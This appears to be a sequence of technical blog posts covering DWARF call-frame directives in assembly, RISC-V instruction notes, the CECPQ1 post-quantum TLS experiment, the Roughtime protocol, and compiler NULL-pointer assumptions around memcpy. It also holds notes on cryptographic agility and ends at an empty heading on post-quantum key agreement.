Despite compilers getting better over time, it's still the case that hand-written assembly can be worthwhile for certain hot-spots. Sometimes there are special CPU instructions for the thing that you're trying to do, sometimes you need detailed control of the resulting code and, to some extent, it remains possible for some people to out-optimise a compiler.

But hand-written assembly doesn't automatically get some of the things that the compiler generates for normal code, such as debugging information. Perhaps your assembly code never crashes (although any function that takes a pointer can suffer from bugs in other code) but you probably still care about accurate profiling information. In order for debuggers to walk up the stack in a core file, or for profilers to correctly account for CPU time, they need be able to unwind call frames.

Unwinding used to be easy as every function would have a standard prologue:

push rbp
mov rbp, rsp

This would make the stack look like this (remember that stacks grow downwards in memory):

Caller's stackRSP value before CALLRSP at function entryCaller's RBPCallee's local variablesSaved RIP(pushed by CALL)RBP always points here

So, upon entry to a function, the CALL instruction that jumped to the function in question will have pushed the previous program counter (from the RIP register) onto the stack. Then the function prologue saves the current value of RBP on the stack and copies the current value of the stack pointer into RBP. From this point until the function is complete, RBP won't be touched.

This makes stack unwinding easy because RBP always points to the call frame for the current function. That gets you the saved address of the parent call and the saved value of its RBP and so on.

The problems with this scheme are that a) the function prologue can be excessive for small functions and b) we would like to be able to use RBP as a general purpose register to avoid spills. Which is why the GCC documentation says that “-O also turns on -fomit-frame-pointer on machines where doing so does not interfere with debugging”. This means that you can't depend on being able to unwind stacks like this. A process can be comprised of various shared libraries, any of which might be compiled with optimisations.

To be able to unwind the stack without depending on this convention, additional debugging tables are needed. The compiler will generate these automatically (when asked) for code that it generates, but it's something that we need to worry about when writing assembly functions ourselves if we want profilers and debuggers to work.

The reference for the assembly directives that we'll need is here, but they are very lightly documented. You can understand more by reading the DWARF spec, which documents the data that is being generated. Specifically see sections 6.4 and D.6. But I'll try to tie the two together in this post.

The tables that we need the assembler to emit for us are called Call Frame Information (CFI). (Not to be confused with Control Flow Integrity, which is very different.) Based on that name, all the assembler directives begin with .cfi_.

Next we need to define the Canonical Frame Address (CFA). This is the value of the stack pointer just before the CALL instruction in the parent function. In the diagram above, it's the value indicated by “RSP value before CALL”. Our first task will be to define data that allows the CFA to be calculated for any given instruction.

The CFI tables allow the CFA to be expressed as a register value plus an offset. For example, immediately upon function entry the CFA is RSP + 8. (The eight byte offset is because the CALL instruction will have pushed the previous RIP on the stack.)

As the function executes, however, the expression will probably change. If nothing else, after pushing a value onto the stack we would need to increase the offset.

So one design for the CFI table would be to store a (register, offset) pair for every instruction. Conceptually that's what we do but, to save space, only changes from instruction to instruction are stored.

It's time for an example, so here's a trivial assembly function that includes CFI directives and a running commentary.

  .globl  square
  .type   square,@function
  .hidden square
square:

This is a standard preamble for a function that's unrelated to CFI. Your assembly code should already be full of this.

  .cfi_startproc

Our first CFI directive. This is needed at the start of every annotated function. It causes a new CFI table for this function to be initialised.

  .cfi_def_cfa rsp, 8

This is defining the CFA expression as a register plus offset. One of the things that you'll see compilers do is express the registers as numbers rather than names. But, at least with GAS, you can write names. (I've included a table of DWARF register numbers and names below in case you need it.)

Getting back to the directive, this is just specifying what I discussed above: on entry to a function, the CFA is at RSP + 8.

  push    rbp
  .cfi_def_cfa rsp, 16

After pushing something to the stack, the value of RSP will have changed so we need to update the CFA expression. It's now RSP + 16, to account for the eight bytes we pushed.

  mov     rbp, rsp
  .cfi_def_cfa rbp, 16

This function happens to have a standard prologue, so we'll save the frame pointer in RBP, following the old convention. Thus, for the rest of the function we can define the CFA as RBP + 16 and manipulate the stack without having to worry about it again.

  mov     DWORD PTR [rbp-4], edi
  mov     eax, DWORD PTR [rbp-4]
  imul    eax, DWORD PTR [rbp-4]
  pop     rbp
  .cfi_def_cfa rsp, 8

We're getting ready to return from this function and, after restoring RBP from the stack, the old CFA expression is invalid because the value of RBP has changed. So we define it as RSP + 8 again.

  ret
  .cfi_endproc

At the end of the function we need to trigger the CFI table to be emitted. (It's an error if a CFI table is left open at the end of the file.)

The CFI tables for an object file can be dumped with objdump -W and, if you do that for the example above, you'll see two tables: something called a CIE and something called an FDE.

The CIE (Common Information Entry) table contains information common to all functions and it's worth taking a look at it:

… CIE
  Version:         1
  Augmentation:    "zR"
  Code alignment factor: 1
  Data alignment factor: -8
  Return address column: 16
  Augmentation data:     1b

  DW_CFA_def_cfa: r7 (rsp) ofs 8
  DW_CFA_offset: r16 (rip) at cfa-8

You can ignore everything until the DW_CFA_… lines at the end. They define CFI directives that are common to all functions (that reference this CIE). The first is saying that the CFA is at RSP + 8, which is what we had already defined at function entry. This means that you don't need a CFI directive at the beginning of the function. Basically RSP + 8 is already the default.

The second directive is something that we'll get to when we discuss saving registers.

If we look at the FDE (Frame Description Entry) for the example function that we defined, we see that it reflects the CFI directives from the assembly:

… FDE cie=…
  DW_CFA_advance_loc: 1 to 0000000000000001
  DW_CFA_def_cfa: r7 (rsp) ofs 16
  DW_CFA_advance_loc: 3 to 0000000000000004
  DW_CFA_def_cfa: r6 (rbp) ofs 16
  DW_CFA_advance_loc: 11 to 000000000000000f
  DW_CFA_def_cfa: r7 (rsp) ofs 8

The FDE describes the range of instructions that it's valid for and is a series of operations to either update the CFA expression, or to skip over the next n bytes of instructions. Fairly obvious.

Optimisations for CFA directives

There are some shortcuts when writing CFA directives:

Firstly, you can update just the offset, or just the register, with cfi_def_cfa_offset and cfi_def_cfa_register respectively. This not only saves typing in the source file, it saves bytes in the table too.

Secondly, you can update the offset with a relative value using cfi_adjust_cfa_offset. This is useful when pushing lots of values to the stack as the offset will increase by eight each time.

Here's the example from above, but using these directives and omitting the first directive that we don't need because of the CIE:

  .globl  square
  .type   square,@function
  .hidden square
square:
  .cfi_startproc
  push    rbp
  .cfi_adjust_cfa_offset 8
  mov     rbp, rsp
  .cfi_def_cfa_register rbp
  mov     DWORD PTR [rbp-4], edi
  mov     eax, DWORD PTR [rbp-4]
  imul    eax, DWORD PTR [rbp-4]
  pop     rbp
  .cfi_def_cfa rsp, 8
  ret
  .cfi_endproc

Saving registers

Consider a profiler that is unwinding the stack after a profiling signal. It calculates the CFA of the active function and, from that, finds the parent function. Now it needs to calculate the parent function's CFA and, from the CFI tables, discovers that it's related to RBX. Since RBX is a callee-saved register, that's reasonable, but the active function might have stomped RBX. So, in order for the unwinding to proceed it needs a way to find where the active function saved the old value of RBX. So there are more CFI directives that let you document where registers have been saved.

Registers can either be saved at an offset from the CFA (i.e. on the stack), or in another register. Most of the time they'll be saved on the stack though because, if you had a caller-saved register to spare, you would be using it first.

To indicate that a register is saved on the stack, use cfi_offset. In the same example as above (see the stack diagram at the top) the caller's RBP is saved at CFA - 16 bytes. So, with saved registers annotated too, it would start like this:

square:
  .cfi_startproc
  push    rbp
  .cfi_adjust_cfa_offset 8
  .cfi_offset rbp, -16

If you need to save a register in another register for some reason, see the documentation for cfi_register.

If you get all of that correct then your debugger should be able to unwind crashes correctly, and your profiler should be able to avoid recording lots of detached functions. However, I'm afraid that I don't know of a better way to test this than to zero RBP, add a crash in the assembly code, and check whether GBD can go up correctly.

(None of this works for Windows. But Per Vognsen, via Twitter, notes that there are similar directives in MASM.)

CFI expressions

New in version three of the DWARF standard are CFI Expressions. These define a stack machine for calculating the CFA value and can be useful when your stack frame is non-standard (which is fairly common in assembly code). However, there's no assembler support for them that I've been able to find, so one has to use cfi_escape and provide the raw DWARF data in a .s file. As an example, see this kernel patch.

Since there's no assembler support, you'll need to read section 2.5 of the standard, then search for DW_CFA_def_cfa_expression and, perhaps, search for cfi_directive in OpenSSL's perlasm script for x86-64 and the places in OpenSSL where that is used. Good luck.

(I suggest testing by adding some instructions that write to NULL in the assembly code and checking that gdb can correctly step up the stack and that info reg shows the correct values for callee-saved registers in the parent frame.)

CFI register numbers

In case you need to use or read the raw register numbers, here they are for a few architectures:

(may be EBP on MacOS) (may be ESP on MacOS)
Register numberx86-64x86ARM
0RAXEAXr0
1RDXECXr1
2RCXEDXr2
3RBXEBXr3
4RSIESPr4
5RDIEBPr5
6RBPESIr6
7RSPEDIr7
8R8r8
9R9r9
10R10r10
11R11r11
12R12r12
13R13r13
14R14r14
15R15r15
16RIP

(x86 values taken from page 25 of this doc. x86-64 values from page 57 of this doc. ARM taken from page 7 of this doc.)

RISC-V assembly

RISC-V is a new, open instruction set. Fabrice Bellard wrote a Javascript emulator for it that boots Linux here (more info). I happen to have just gotten a physical chip that implements it too (one of these) and what's cool is that you can get the source code to the chip on GitHub.

The full, user-level instruction set is documented but there's a lot of information in there. I wanted a brief summary of things that I could keep in mind when reading disassembly. This blog post is just a dump of my notes; it's probably not very useful for most people! It also leaves out a lot of things that come up less frequently. There's also an unofficial reference card which is good, but still aimed a little low for me.

RISC-V is little-endian and comes in 32 and 64 bit flavours. In keeping with the RISC-V documents, the flavour (either 32 or 64) is called XLEN below in the few places where it matters.

For both, int is 32 bits. Pointers and long are the native register size. Signed values are always sign extended in a larger register and unsigned 8- and 16-bit values are zero extended. But unsigned 32-bit values are sign-extended. Everything has natural alignment in structs and the like, but alignment isn't required by the hardware.

The stack grows downwards and is 16-byte aligned upon entry to a function.

Instructions are all 32 bits and 32-bit aligned. There is a compressed-instruction extension that adds 16-bit instructions and changes the required alignment of all instructions to just 16 bits. Unlike Thumb on ARM, RISC-V compressed instructions are just a short-hand for some 32-bit instruction and 16- and 32-bit instructions can be mixed freely.

There are 31 general purpose registers called x1–x31. Register x0 drops all writes and always reads as zero. Each register is given an alias too, which describes their conventional use:

RegisterAliasDescriptionSaved by
x0zeroZero
x1raReturn addressCaller
x2spStack pointerCallee
x3gpGlobal pointer
x4tpThread pointer
x5–7t0–2TemporaryCaller
x8s0/fpSaved register / frame pointerCallee
x9s1Saved registerCallee
x10–17a1–a7Arguments and return valuesCaller
x18–27s2–11Saved registersCallee
x28–31t3–6TemporaryCaller

There are two types of immediates, which will be written as ‘I’ and ‘J’. Type ‘I’ intermediates are 12-bit, signed values and type ‘J’ are 20-bit, signed values. They are always sign-extended to the width of a register before use.

Arithmetic

There's no carry flag, instead one has to use a comparison instruction on the result in order to get the carry in a register.

A U suffix indicates an unsigned operation. Note that the multiplication and division instructions are part of the ‘M’ extension, but I expect most chips to have them.

InstructionEffectNotes
ADD dest,src1,src2dest = src1 + src2
SUB dest,src1,src2dest = src1 - src2
ADDI dest,src1,Idest = src1 + I
MUL dest,src1,src2dest = src1 × src2
MULH[|U|SH] dest,src1,src2dest = (src1 × src2) >> XLENThis returns the high word of the multiplication result for signed×signed, unsigned×unsigned or signed×unsigned, respectively
DIV[U] dest,src1,src2dest = src1/src2There's no trap on divide-by-zero, rather special values are returned. (See documentation.)
REM[U] dest,src1,src2dest = src1%src2

Bitwise

These should all be obvious:

Instruction
AND dest,src1,src2
OR dest,src1,src2
XOR dest,src1,src2
ANDI dest,src1,I
ORI dest,src1,I
XORI dest,src1,I

Shifts

Instructions here are Shift [Left|Right] [Logical|Arithmetic].

Note that only the minimal number of bits are read from the shift count. So shifting by the width of the register doesn't zero it, it does nothing.

InstructionEffectNotes
SLL dest,src1,src2dest = src1 << src2%XLEN
SRL dest,src1,src2dest = src1 >> src2%XLEN
SRA dest,src1,src2dest = src1 >> src2%XLEN
SLLI dest,src1,0‥31/63dest = src1 << I
SRLI dest,src1,0‥31/63dest = src1 >> I
SRAI dest,src1,0‥31/63dest = src1 >> I

Comparisons

These instructions set the destination register to one or zero depending on whether the relation is true or not.

InstructionEffectNotes
SLT dest,src1,src2dest = src1<src2(signed compare)
SLTU dest,src1,src2dest = src1<src2(unsigned compare)
SLTI dest,src1,Idest = src1<I(signed compare)
SLTIU dest,src1,Idest = src1<I(unsigned compare, but remember that the immediate is sign-extended first)

Control flow

The JAL[R] instructions write the address of the next instruction to the destination register for the subsequent return. This can be x0 if you don't care.

Many instructions here take an immediate that is doubled before use. That's because no instruction (even with compressed instructions) can ever start on an odd address. However, when you write the value in assembly you write the actual value; the assembler will halve it when encoding.

InstructionEffectNotes
JAL dest,Jdest = pc+2/4; pc+=2*J
JALR dest,src,Idest = pc+2/4; pc=src1+(I&~1)Note that the least-significant bit of the address is ignored
BEQ src1,src2,Iif src1==src2, pc+=2*I
BNE src1,src2,Iif src1!=src2, pc+=2*I
BLT src1,src2,Iif src1<src2, pc+=2*Isigned compare
BLTU src1,src2,Iif src1<src2, pc+=2*Iunsigned compare
BGE src1,src2,Iif src1>=src2, pc+=2*Isigned compare
BGEU src1,src2,Iif src1>=src2, pc+=2*Iunsigned compare

Memory

The suffix on these instructions denotes the size of the value read or written: ‘D’ = double-word (64 bits), ‘W’ = word (32 bits), ‘H’ = half-word (16 bits), ´B’ = byte. Reading and writing 64-bit values only works on 64-bit systems, and LWU only exists on 64-bit systems because it's the same as LW otherwise.

Alignment is not required, but might be faster. Also note that there's no consistent direction of data flow in the textual form of the assembly: the register always comes first.

InstructionEffectNotes
L[D|W|H|B] dest,I(src)dest = *(src + I)result is sign extended
L[D|W|H|B]U dest,I(src)dest = *(src + I)result is zero extended
S[D|W|H|B] src1,I(src2)*(src2 + I) = src1

Other

InstructionEffectNotes
LUI dest,Jdest = J<<12“Load Upper Immediate”. The result is sign extended on 64-bit.
AUIPC dest,Jdest = pc + J<<12“Add Upper Immediate to PC”. The result of the shift is sign-extended on 64-bit before the addition.

W instructions

These instructions only exist on 64-bit and are copies of the same instruction without the ‘W’ suffix, except that they operate only on the lower 32 bits of the registers and, when writing the result, sign-extend to 64 bits. They are ADDW, SUBW, ADDIW, DIV[U]W, REM[U]W, S[L|R]LW, SRAW, S[L|R]LIW and SRAIW

Pseudo-instructions

For clarity, there are also a number of pseudo-instructions defined. These are just syntactic sugar for one of the primitive instructions, above. Here's a handful of the more useful ones:

Pseudo-instructionTranslation
nopaddi x0,x0,0
mv dest,srcaddi dest,src,0
not dest,srcxor dest,src,-1
seqz dest,srcsltiu dest,src,1
snez dest,srcsltu dest,x0,src
j Jjal x0,J
retjalr x0,x1,0
call offsetauipc x6, offset >> 12; jalr x1,x6,offset & 0xfff
li dest,value(possibly several instructions to load arbitrary value)
la dest,symbolauipc dest, symbol >> 12; addi dest,dest,offset & 0xfff
l[d|w|h|b] dest,symbolauipc dest, symbol >> 12; lx dest,offset & 0xfff(dest)
s[d|w|h|b] src,symbolauipc dest, symbol >> 12; sx dest,offset & 0xfff(dest)

Note that the instructions that expand to two instructions where the first is AUIPC aren't quite as simple as they appear. Since the 12-bit immediate in the second instruction is sign extended, it could end up negative. If that happens, the J immediate for AUIPC needs to be one greater and then you can reach the value by subtracting from there.

CECPQ1 results

In July my colleague, Matt Braithwaite, announced that Chrome and Google would be experimenting with a post-quantum key-agreement primitive in TLS. One should read the original announcement for details, but we had two goals for this experiment:

Firstly we wanted to direct cryptoanalytic attention at the family of Ring Learning-with-Errors (RLWE) problems. The algorithm that we used, NewHope, is part of this family and appeared to be the most promising when we selected one at the end of 2015.

It's very difficult to know whether we had any impact here, but it's good to see the recent publication and withdrawal of a paper describing a quantum attack on a fundamental lattice problem. Although the algorithm contained an error, it still shows that capable people are testing these new foundations.

Our second goal was to measure the feasibility of deploying post-quantum key-agreement in TLS by combining NewHope with an existing key-agreement (X25519). We called the combination CECPQ1.

TLS key agreements have never been so large and we expected a latency impact from the extra network traffic. Also, any incompatibilities with middleboxes can take years to sort out, so it's best to discover them as early as possible.

Here the results are more concrete: we did not find any unexpected impediment to deploying something like NewHope. There were no reported problems caused by enabling it.

Although the median connection latency only increased by a millisecond, the latency for the slowest 5% increased by 20ms and, for the slowest 1%, by 150ms. Since NewHope is computationally inexpensive, we're assuming that this is caused entirely by the increased message sizes. Since connection latencies compound on the web (because subresource discovery is delayed), the data requirement of NewHope is moderately expensive for people on slower connections.

None the less, if the need arose, it would be practical to quickly deploy NewHope in TLS 1.2. (TLS 1.3 makes things a little more complex and we did not test with CECPQ1 with it.)

At this point the experiment is concluded. We do not want to promote CECPQ1 as a de-facto standard and so a future Chrome update will disable CECPQ1 support. It's likely that TLS will want a post-quantum key-agreement in the future but a more multilateral approach is preferable for something intended to be more than an experiment.

Roughtime

Security protocols often assume an accurate, local clock (e.g. TLS, Kerberos, DNSSEC and more). It's a widely accepted assumption when designing protocols but, for a lot of people, it just isn't true. We find good evidence that at least 25% of all certificate errors in Chrome are due to a bad local clock.

Even when the local clock is being synchronised, it's very likely to be using unauthenticated NTP. So if your threat model includes man-in-the-middle attackers then you still can't trust the local clock.

There have been efforts to augment NTP with authentication, but they still assume a world where each client trusts one or more time servers absolutely. In order to explore a solution that allows time servers to be effectively audited by clients, myself and my colleague Matt Braithwaite (with assistance and advice from Ben Laurie and Michael Shields) have developed Roughtime.

Very briefly: using some tricks we believe that it's viable to deploy servers that sign a client-chosen nonce and timestamp on demand. Once you have several of these servers, clients can generate their nonces by hashing replies from other servers with some entropy. That proves that a nonce was created after the reply was received. Clients maintain a chain of nonces and replies and, if a server misbehaves, can use replies from several other servers to prove and report it.

Currently there's only one Roughtime service running, so the idea of spreading trust around is inchoate. But we would like to gauge whether others are interested in this idea, specifically whether there are any organisations who would be seriously interested in deploying something like this in their clients. (Because I assume that, if you have clients, then you'll also be interested in running a server.)

There's a much longer introduction and many more details on the Roughtime site and we've also setup a mailing list.

memcpy (and friends) with NULL pointers

The C standard (ISO/IEC 9899:2011) has a sane-seeming definition of memcpy (section 7.24.2.1):

The memcpy function copies n characters from the object pointed to by s2 into the object pointed to by s1.

Apart from a prohibition on passing overlapping objects, I think every C programmer understands that.

However, the standard also says (section 7.1.4):

If an argument to a function has an invalid value (such as a value outside the domain of the function, or a pointer outside the address space of the program, or a null pointer, or a pointer to non-modifiable storage when the corresponding parameter is not const-qualified) or a type (after promotion) not expected by a function with variable number of arguments, the behavior is undefined.

(Emphasis is mine.)

I'm sure that 7.1.4 seemed quite reasonable in isolation, but how does it interact with the case where memcpy is called with a zero length? If you read 7.24.2.1 then you might well think that, since the function copies zero bytes, it's valid to pass NULL as either of the pointer arguments. I claim that the vast majority of C programmers would agree with that, but 7.24.1(2) clarifies that 7.1.4 really does apply:

Where an argument declared as size_t n specifies the length of the array for a function, n can have the value zero […] pointer arguments on such a call shall still have valid values, as described in 7.1.4.

(Nobody would actually write memcpy(NULL, NULL, 0), of course, because it (at best) does nothing. But such a call can easily arise at run-time when an empty object is handled by a more general function.)

Some compilers will use this corner of the standard to assume that pointers passed to memcpy are non-NULL, irrespective of the length argument. GCC has built this in, while Clang can get it from the fact that glibc annotates memcpy with nonnull specifications.

Consider the following function:

#include <stdint.h>
#include <string.h>

int f(uint8_t *dest, uint8_t *src, size_t len) {
  memcpy(dest, src, len);
  return dest == NULL;
}

Here's the output of building that with GCC 6.1.1 with -O2:

0000000000000000 <f>:
   0:	48 83 ec 08          	sub    rsp,0x8
   4:	e8 00 00 00 00       	call   9 <f+0x9>  # memcpy
   9:	31 c0                	xor    eax,eax
   b:	48 83 c4 08          	add    rsp,0x8
   f:	c3                   	ret

From that we can see that rax (which holds the return value of a function in the amd64 ABI) is unconditionally set to zero, i.e. the compiler has assumed that dest == NULL is false because it has been passed to memcpy. The compiler's reasoning goes like this: 7.1.4 says that passing a NULL pointer to a standard library function is undefined behaviour, therefore if dest was NULL any behaviour is reasonable. So the code can be optimised with the assumption that it's non-NULL, as that's the only case with defined behaviour.

(You can also play with this snippet in Matt Godbolt's excellent tool.)

Opinions on this vary from “the C standard defines the language thus that optimisation is fine by definition” to “that's crazy: there's a huge amount of code out there that probably assumes the obvious behaviour of memcpy”. Personally, I find myself further towards the latter position than the former.

Also, it's not just memcpy: the same optimisations are annotated in glibc for (at least) memccpy, memset, memcmp, memchr, memrchr, memmem, mempcpy, bcopy and bcmp. Section 7.1.4 can be applied to any standard library function.

Measurement

To try and figure out the impact that this optimisation is having I built a number of open-source programs with GCC 6.1.1, with -fno-builtin (to disable GCC's built-in versions of these functions) and with glibc's string.h including, or not, the nonnull annotations. For example, the snippet of code above produces this diff when tested this way:

0000000000000000 <f>:
-   0:	48 83 ec 08          	sub    rsp,0x8
+   0:	53                   	push   rbx
+   1:	48 89 fb             	mov    rbx,rdi
    4:	e8 00 00 00 00       	call   9 <f+0x9>
    9:	31 c0                	xor    eax,eax
-   b:	48 83 c4 08          	add    rsp,0x8
-   f:	c3                   	ret    
+   b:	48 85 db             	test   rbx,rbx
+   e:	0f 94 c0             	sete   al
+  11:	5b                   	pop    rbx
+  12:	c3                   	ret    

The added code tests dest to set the return value, as intended.

The first program I tested was BIND 9.9.5 because of this advisory that says: “GCC now includes (by default) an optimization which is intended to eliminate unnecessary null pointer comparisons in compiled code. Unfortunately this optimization removes checks which are necessary in BIND and the demonstrated effect is to cause unpredictable assertion failures during execution of named, resulting in termination of the server process”. Although version 9.9.5 should be affected according to the advisory, I found no differences in the compiled output based on nonnull annotations in string.h. Perhaps it's because I'm using a different GCC, perhaps I just got something wrong in my testing, or perhaps these checks were eliminated for different reasons. (For example, a local root exploit in the kernel was enabled by a dereference-based removal of a NULL check.)

Next up, I tried something that I'm more involved with: BoringSSL. Here there are two changes: a reordering of two conditions in OPENSSL_realloc_clean (which has no semantic effect) and extensive changes in BN_mod_exp_mont. I'm sure I would be able to do a better analysis if I were more experienced with disassembling large programs, but I'm just using objdump and diff. Still, I believe that all the changes are the result of a single NULL check being removed and then the resulting offset shift of all the following code. That counts as an optimisation, but it's statically clear that the pointer cannot be NULL even without any assumptions about string.h functions so I struggle to give much credit.

Since BoringSSL showed some changes, I tried OpenSSL 1.0.2h. This also shows the same large changes around BN_mod_exp_mont. There's also a large change in dsa_builtin_paramgen2 (a function that we don't have in BoringSSL) but that appears to be another insignificant NULL-check removed and a consequent change of all the later offsets. Lastly, there are a handful of no-op changes: like swapping the arguments to cmp before jne.

Next I tried openssh-7.2p2, which shows no changes. I wondered whether someone had already done this analysis and corrected any problems in OpenSSH so tried a much older version too: 5.4p1. That does show a small, but non-trivial, change in ssh_rsa_verify. After a bit of thought, I believe that GCC has managed to eliminate a test for a non-NULL pointer at the end of openssh_RSA_verify. Just like the BoringSSL case, it's already possible to deduce that the pointer must be non-NULL without any section 7.1.4 assumptions.

Conclusions

It's clear that one has to write C code that's resilient to the compiler assuming that any pointers passed to standard library functions are non-NULL. There have been too many releases of glibc and GCC with this in to safely assume that it'll ever go away.

However, the benefits of this (i.e. the optimisations that the compiler can perform because of it) are nearly zero. Large programs can be built where it has no effect. When there are changes they are either cases that the compiler should have been able to figure out anyway, or else noise changes with no effect.

As for the costs: there have been several cases where removing NULL checks has resulted in a security vulnerability, although I can't find any cases of this precise corner of the C standard causing it. It also adds a very subtle, exceptional case to several very common functions, burdening programmers. But it thankfully rarely seems to make a difference in real-life code, so hopefully there's not a large pool of bugs in legacy code that have been created by this change.

Still, given the huge amount of legacy C code that exists, this optimisation seems unwise to me. Although I've little hope of it happening, I'd suggest that GCC and glibc remove these assumptions and that the next revision of the C standard change 7.24.1(2) to clarify that when a length is zero, pointers can be NULL.

If anyone wishes to check my results here, I've put the scripts that I used on GitHub. I'm afraid that it takes a bit of manual setup and, given variation in GCC versions across systems, some differences are to be expected but the results should be reproducible.

Cryptographic Agility

(These are notes that I wrote up from a talk that I gave at the National Academies Forum on Cyber Resilience. You can tell that it was in Washington, DC because of the “cyber”.

I wasn't quite sure how technical to pitch this talk so it's relatively introductory; regular readers probably know all this.

This isn't a transcript of what I said, but I try to hit the main points in my notes.)

Firstly I'd like to separate extensibility from agility. A protocol is extensible if you can add features to it without having to update every implementation at the same time—which is generally impossible. Cryptographic agility depends on having extensibility, at least if you ever want to use something that wasn't designed into a protocol at the beginning.

Protocols should be extensible: the world keeps changing and no design is going to be perfect for all time. But extensibility is much harder in practice than it sounds.

I happen to be particularly familiar with TLS and TLS has two, major extensibility mechanisms. The first is a simple version number. Here's how the specification says that it should work:

Client: I support up to version 1.2.

Server: (calculates the minimum of the version that the client supports and the maximum version that the server supports) Ok, let's use version 1.1.

This is commendably simple: it's not possible to express a range of versions and certainly not a discontinuous range. This is about as simple as an extensibility mechanism could be, and yet lots of implementations get it wrong. It's a common mistake for implementations to return an error when the client offers a version number that they don't understand.

This, of course, means that deploying new versions doesn't work. But it's insidious because the server will work fine until someone tries to deploy a new version. We thought that we had flexibility in the protocol but it turned out that bugs in code had rusted it in place.

At this point it's worth recalling the Law of the Internet: blame attaches to the last thing that changed. If Chrome updates and then something stops working then Chrome gets the blame. It doesn't matter that the server couldn't correctly calculate the minimum of two numbers. No normal person understands or cares about that.

What's to be done about this? Well, we work around issues if they're big and suck up the breakage if they're small. It's taken about 15 years to get to the point where web browsers don't have to work around broken version negotiation in TLS and that's mostly because we only have three active versions of TLS. When we try to add a fourth (TLS 1.3) in the next year, we'll have to add back the workaround, no doubt. In summary, this extensibility mechanism hasn't worked well because it's rarely used and that lets bugs thrive.

TLS has a second, major extension mechanism which is a series of (key, value) pairs where servers should ignore unknown keys. This has worked a little better because, while there are only three or four versions in play, with many years between versions, there are 25 to 30 extensions defined. It's not perfect: bugs in implementations have led them to be dependent on the order of extensions and somebody at least managed to write a server that breaks if the last value is empty.

Sometimes more extensibility points have been added inside of extensions in the expectation that it'll save adding another, top-level extension in the future. This has generally been a mistake: these extension points have added complexity for little reason and, when we try to use them, we often find that bugs have rusted them solid anyway. They've just been a waste.

There's a lesson in all this: have one joint and keep it well oiled.

Protocol designers underestimate how badly people will implement their designs. Writing down how you think it should work and hoping that it'll work, doesn't work. TLS's protocol negotiation is trivial and the specification is clear, yet it still didn't work in practice because it's difficult to oil.

Rather one needs to minimise complexity, concentrate all extensibility in a single place and actively defend it. An active defense can take many forms: fuzzing the extensibility system in test suites and compliance testing is good. You might want to define and implement dummy extensions once a year or such, and retire old ones on a similar schedule. When extensions contain lists of values, define a range of values that clients insert at random. In short, be creative otherwise you'll find that bug rust will quickly settle in.

Agility itself

Cryptographic agility is a huge cost. Implementing and supporting multiple algorithms means more code. More code begets more bugs. More things in general means less academic focus on any one thing, and less testing and code-review per thing. Any increase in the number of options also means more combinations and a higher chance for a bad interaction to arise.

Let's just consider symmetric ciphers for a moment. Because everyone wants them to be as fast as possible, BoringSSL currently contains 27 thousand lines of Perl scripts (taken from OpenSSL, who wrote them all) that generate assembly code just in order to implement AES-GCM. That's a tremendous amount of work and a tremendous scope for bugs.

Focusing again on TLS: over the years, 25 different ciphers and modes have been specified for use in TLS. Thankfully, of those, only nine are actively used. But that doesn't mean that the zombies of the others might not still be lurking around, ready to cause problems.

Where did this mess of diversity come from?

1. Old age / we had no idea what we were doing in the 1990's:

3DES_EDE_CBC AES_128_CBC AES_256_CBC DES40_CBC
DES_CBC DES_CBC_40 IDEA_CBC NULL
RC2_CBC_40 RC4_128 RC4_40

A lot of mistakes were made in the 1990's—we really didn't know what we were doing. Phil Rogaway did, but sadly not enough people listened to him; probably because they were busy fighting the US Government which was trying to ban the whole field of study at the time. Unfortunately that coincided with the early inflation period of the internet and a lot of those mistakes were embedded pretty deeply. We're still living with them today.

2. National pride cipher suites

ARIA_128_CBC ARIA_128_GCM ARIA_256_CBC ARIA_256_GCM
CAMELLIA_128_CBC CAMELLIA_128_GCM CAMELLIA_256_CBC CAMELLIA_256_GCM
SEED_CBC

The next cause of excess agility are the national pride cipher suites. Many countries consider cryptography to be an area of national interest but then mistakenly believe that means that they have to invent their own standards and primitives. South Korea and Japan were especially forthright about this and so managed to get these ciphers assigned code points in TLS but Russia and China and, to some extent, many other countries do the same thing.

Although they receive limited analysis compared to something like AES, they're generally not bad, per se, but they bring nothing new to the table: they add nothing but costs, and the costs are significant. Cryptographic diversity for the point of national pride should be strenuously resisted for that reason. Other countries may complain that the US got their standards widely used but the US got to specify a lot about the internet by being the first mover. (And AES is from Belgium anyway.) However, it is the case that I'm not aware of any of these national standards being used to promote something that's actually a deliberate backdoor; which is, of course, not true of the US.

3. Reasonable cases for diversity:

  • Embedded systems want to minimise circuit size: AES_128_CCM and AES_256_CCM.
  • We want something faster for when we don't have AES hardware: CHACHA20_POLY1305.
  • US Government standard, got hardware support from Intel: AES_128_GCM and AES_256_GCM.

Now we come to the ones that are reasonable to use and the reasons for diversity there. It's all about performance optimisation for different environments really: tiny devices want CCM because it only needs an AES-encrypt circuit. Devices without hardware support for AES-GCM want to use ChaCha20-Poly1305 because it's much more efficient in software. Everything else wants to use AES-GCM.

Agility has allowed us to introduce the ciphers in the final set and that's really important. But it's equally important to kill off the old stuff, and that's very hard. Nearly all the incentives are aligned against it. Recall the Law of the Internet (mentioned above); users hate stuff breaking and always blame you. Even djb will take to Twitter when one drops DSA support.

We have a long conveyor belt of primitives, we put new ones at the front and, every so often, we turn the crank and something drops off the end. In addition to all the obvious problems with killing off old stuff, that also means that there's a lot of inadvisable options that will generally function at any given time and this is leading to new products launching with no idea that they're sitting towards the end of this conveyor belt. These products expect a lifetime of some number of years and are unaware that we hope to discontinue something that they're using much sooner than that. It's no longer the case that we can assume that waiting a year will result in a reduction of the amount of use that a deprecated primitive gets because of new launches.

Google tries to address this where it can by requiring support for the newest options in our certification process for devices that interact with our services. But only a tiny subset of the things that interact with Google go through any of our certifications.

Things are even harder in non-interactive cases. TLS at least gets to negotiate between the client and server but algorithms in S/MIME messages and certificate signatures don't allow that. (One can think of ways to help change that, but the current reality is that they're not negotiated.) That's why dropping SHA-1 support in certificates has been a such a gruesome fight and why PKCS#8 messages still require us to support 40-bit RC2.

So what's the lesson here? I'd say that you need extensibility but, when it comes to cryptographic agility, have one option. Maybe two. Fight to keep it that small.

It's worth highlighting that, for the purposes of time, I've simplified things dramatically. I've considered only symmetric ciphers and modes above but, even within TLS, there's a whole separate conveyor belt for asymmetric algorithms. And I've not mentioned the oncoming storm of quantum computers. Quantum computers are going to be hilarious and I hope to be retired before they get big enough to cause problems!

Post-quantum key agreement

